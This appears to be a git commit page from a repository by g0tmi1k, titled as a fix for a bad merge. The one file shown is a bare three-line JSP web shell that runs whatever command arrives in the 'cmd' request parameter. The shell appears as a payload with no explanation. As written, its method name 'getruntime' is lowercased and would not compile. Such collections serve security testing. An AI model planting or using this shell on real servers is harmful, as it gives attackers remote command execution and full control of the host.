Fix #259 - Recover from bad merge

This commit is contained in:
g0tmi1k
2019-01-07 15:40:56 +00:00
parent f12997e268
commit 5e1dc9cc79
60 changed files with 18630792 additions and 0 deletions
+3
View File
@@ -0,0 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>